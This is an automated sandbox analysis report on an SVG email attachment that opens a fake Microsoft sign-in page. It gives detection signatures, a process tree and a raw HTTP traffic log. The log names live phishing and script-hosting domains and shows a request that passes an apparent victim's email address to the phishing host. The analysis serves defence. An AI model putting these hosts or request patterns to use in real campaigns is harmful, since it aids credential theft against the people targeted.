Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
TRANS_ADV_9290910137_.svg

Overview

General Information

Sample name:TRANS_ADV_9290910137_.svg
Analysis ID:1648348
MD5:7b341b85cc6592b164bdb89e523773e6
SHA1:fb90fd35e542803631797d5f1af9c2bd8ac41caa
SHA256:ebb1aa64e9f2eeaebf01d56bb3f5d42bb13f030f7418417a22840926a4918e62
Infos:

Detection

HTMLPhisher
Score:64
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
Yara detected HtmlPhish10
AI detected suspicious Javascript
Yara detected JavaScript embedded in SVG
Creates files inside the system directory
Deletes files inside the Windows folder
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden javascript code
HTML title does not match URL
Invalid T&C link found
None HTTPS page querying sensitive user data (password, username or email)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64_ra
  • chrome.exe (PID: 7016 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\TRANS_ADV_9290910137_.svg MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6256 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2016,i,17266258622726128370,13840176397615438204,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2116 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
TRANS_ADV_9290910137_.svgJoeSecurity_JavaScriptembeddedinSVGYara detected JavaScript embedded in SVGJoe Security

    HTML

    SourceRuleDescriptionAuthorStrings
    0.6.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      0.7.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security

        Sigma Signatures

        No Sigma rule has matched

        Suricata Signatures

        No Suricata rule has matched

        Joe Sandbox Signatures

        • Phishing
        • Compliance
        • Software Vulnerabilities
        • Networking
        • System Summary

        Click to jump to signature section

        Show All Signature Results

        Phishing

        barindex
        Source: file:///C:/Users/user/Desktop/TRANS_ADV_9290910137_.svgJoe Sandbox AI: Score: 10 Reasons: HTML file with login form DOM: 0.6.pages.csv
        Source: Yara matchFile source: 0.6.pages.csv, type: HTML
        Source: Yara matchFile source: 0.7.pages.csv, type: HTML
        Source: 0.0..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: file:///C:/Users/user/Desktop/TRANS_ADV_9290910137... This script exhibits several high-risk behaviors, including dynamic code execution through the use of `atob()` to decode a URL, and data exfiltration by sending an email address to an external domain. The obfuscated code and URL also raise suspicions. While the intent is unclear, the overall behavior of this script is highly suspicious and poses a significant security risk.
        Source: 0.10..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://5739350082-1317754460.cos.ap-singapore.myq... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of obfuscated code/URLs. The script appears to be downloading and executing a remote PHP file, which could potentially be used for malicious purposes such as stealing user data or executing further malicious code. Additionally, the script uses various techniques to obfuscate its behavior, making it difficult to analyze and understand its true intent. Overall, this script poses a significant security risk and should be treated with caution.
        Source: Yara matchFile source: TRANS_ADV_9290910137_.svg, type: SAMPLE
        Source: file:///C:/Users/user/Desktop/TRANS_ADV_9290910137_.svgHTTP Parser: Number of links: 0
        Source: file:///C:/Users/user/Desktop/TRANS_ADV_9290910137_.svgHTTP Parser: <input type="password" .../> found but no <form action="...
        Source: file:///C:/Users/user/Desktop/TRANS_ADV_9290910137_.svgHTTP Parser: Base64 decoded: Flank magna chicken excepteur kevin frankfurter quis ad.
        Source: file:///C:/Users/user/Desktop/TRANS_ADV_9290910137_.svgHTTP Parser: Title: Sign in to your account does not match URL
        Source: file:///C:/Users/user/Desktop/TRANS_ADV_9290910137_.svgHTTP Parser: Invalid link: Privacy statement
        Source: file:///C:/Users/user/Desktop/TRANS_ADV_9290910137_.svgHTTP Parser: Invalid link: Privacy statement
        Source: file:///C:/Users/user/Desktop/TRANS_ADV_9290910137_.svgHTTP Parser: Has password / email / username input fields
        Source: file:///C:/Users/user/Desktop/TRANS_ADV_9290910137_.svgHTTP Parser: <input type="password" .../> found
        Source: file:///C:/Users/user/Desktop/TRANS_ADV_9290910137_.svgHTTP Parser: No favicon
        Source: file:///C:/Users/user/Desktop/TRANS_ADV_9290910137_.svgHTTP Parser: No favicon
        Source: file:///C:/Users/user/Desktop/TRANS_ADV_9290910137_.svgHTTP Parser: No favicon
        Source: file:///C:/Users/user/Desktop/TRANS_ADV_9290910137_.svgHTTP Parser: No favicon
        Source: file:///C:/Users/user/Desktop/TRANS_ADV_9290910137_.svgHTTP Parser: No favicon
        Source: file:///C:/Users/user/Desktop/TRANS_ADV_9290910137_.svgHTTP Parser: No favicon
        Source: file:///C:/Users/user/Desktop/TRANS_ADV_9290910137_.svgHTTP Parser: No <meta name="author".. found
        Source: file:///C:/Users/user/Desktop/TRANS_ADV_9290910137_.svgHTTP Parser: No <meta name="author".. found
        Source: file:///C:/Users/user/Desktop/TRANS_ADV_9290910137_.svgHTTP Parser: No <meta name="copyright".. found
        Source: file:///C:/Users/user/Desktop/TRANS_ADV_9290910137_.svgHTTP Parser: No <meta name="copyright".. found
        Source: unknownHTTPS traffic detected: 172.67.131.98:443 -> 192.168.2.16:49695 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.131.98:443 -> 192.168.2.16:49698 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.16:49700 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.187.19:443 -> 192.168.2.16:49701 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.187.19:443 -> 192.168.2.16:49708 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.251.35.164:443 -> 192.168.2.16:49711 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.16:49713 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.18.11.207:443 -> 192.168.2.16:49728 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.18.10.207:443 -> 192.168.2.16:49730 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49731 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 151.101.194.137:443 -> 192.168.2.16:49733 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 43.152.64.207:443 -> 192.168.2.16:49732 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 69.49.245.67:443 -> 192.168.2.16:49736 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 23.56.162.51:443 -> 192.168.2.16:49735 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.17.202.1:443 -> 192.168.2.16:49739 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 69.49.245.67:443 -> 192.168.2.16:49740 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 23.209.72.31:443 -> 192.168.2.16:49743 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 23.209.72.9:443 -> 192.168.2.16:49747 version: TLS 1.2
        Source: chrome.exeMemory has grown: Private usage: 1MB later: 41MB
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
        Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
        Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
        Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /TAael?e=benny@wcctxlaw.com HTTP/1.1Host: ajhds.myhaetsinks.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /TAael/?e=benny@wcctxlaw.com HTTP/1.1Host: ajhds.myhaetsinks.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://ajhds.myhaetsinks.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /logos/assets/PNG/Microsoft_Logo_512px.png HTTP/1.1Host: mailmeteor.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://ajhds.myhaetsinks.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/708f7a809116/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://ajhds.myhaetsinks.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/xlu9f/0x4AAAAAABAF5FprBu9O8Y0u/auto/fbE/new/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://ajhds.myhaetsinks.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /logos/assets/PNG/Microsoft_Logo_512px.png HTTP/1.1Host: mailmeteor.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=926055dbacd31b53&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/xlu9f/0x4AAAAAABAF5FprBu9O8Y0u/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/xlu9f/0x4AAAAAABAF5FprBu9O8Y0u/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/2133156609:1742923846:U_2cPe8ET9xlyK6JD5aYeSyIH53btA60HXy0rePwNCY/926055dbacd31b53/HGsCBxkoZXf0Rug_s6hmdGEs9e.t2nshy43I612A1pk-1742925915-1.1.1.1-p0qF5YdnWNooWvv0mcB0NziQfepkiyLcVmDsV5RWGfMl60ih3E9Rs3D_AFPg1Lwm HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/d/926055dbacd31b53/1742925917170/wCFuu2K25XOK2QX HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/xlu9f/0x4AAAAAABAF5FprBu9O8Y0u/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/d/926055dbacd31b53/1742925917170/wCFuu2K25XOK2QX HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/926055dbacd31b53/1742925917178/0f5b33a5f729114e5db2bf2e77931538eec6cd5aa59bd8c789a7df2b94be4fe7/nM2WkquA55gah7Z HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/xlu9f/0x4AAAAAABAF5FprBu9O8Y0u/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/2133156609:1742923846:U_2cPe8ET9xlyK6JD5aYeSyIH53btA60HXy0rePwNCY/926055dbacd31b53/HGsCBxkoZXf0Rug_s6hmdGEs9e.t2nshy43I612A1pk-1742925915-1.1.1.1-p0qF5YdnWNooWvv0mcB0NziQfepkiyLcVmDsV5RWGfMl60ih3E9Rs3D_AFPg1Lwm HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/2133156609:1742923846:U_2cPe8ET9xlyK6JD5aYeSyIH53btA60HXy0rePwNCY/926055dbacd31b53/HGsCBxkoZXf0Rug_s6hmdGEs9e.t2nshy43I612A1pk-1742925915-1.1.1.1-p0qF5YdnWNooWvv0mcB0NziQfepkiyLcVmDsV5RWGfMl60ih3E9Rs3D_AFPg1Lwm HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-aliveOrigin: https://ajhds.myhaetsinks.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ajhds.myhaetsinks.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1Host: stackpath.bootstrapcdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://ajhds.myhaetsinks.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveOrigin: https://ajhds.myhaetsinks.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ajhds.myhaetsinks.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /jquery-3.2.1.slim.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveOrigin: https://ajhds.myhaetsinks.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ajhds.myhaetsinks.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /bootstrap.min.js HTTP/1.1Host: 5739350082-1317754460.cos.ap-singapore.myqcloud.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://ajhds.myhaetsinks.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /dxetjqzbe/image/upload/v1742052868/6059C6BA-9C9F-4199-8218-8895A9F0C3C8_ctielh.png HTTP/1.1Host: res.cloudinary.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://ajhds.myhaetsinks.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /dxetjqzbe/image/upload/v1742052868/6059C6BA-9C9F-4199-8218-8895A9F0C3C8_ctielh.png HTTP/1.1Host: res.cloudinary.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /google.php HTTP/1.1Host: 5739350082.sbsConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
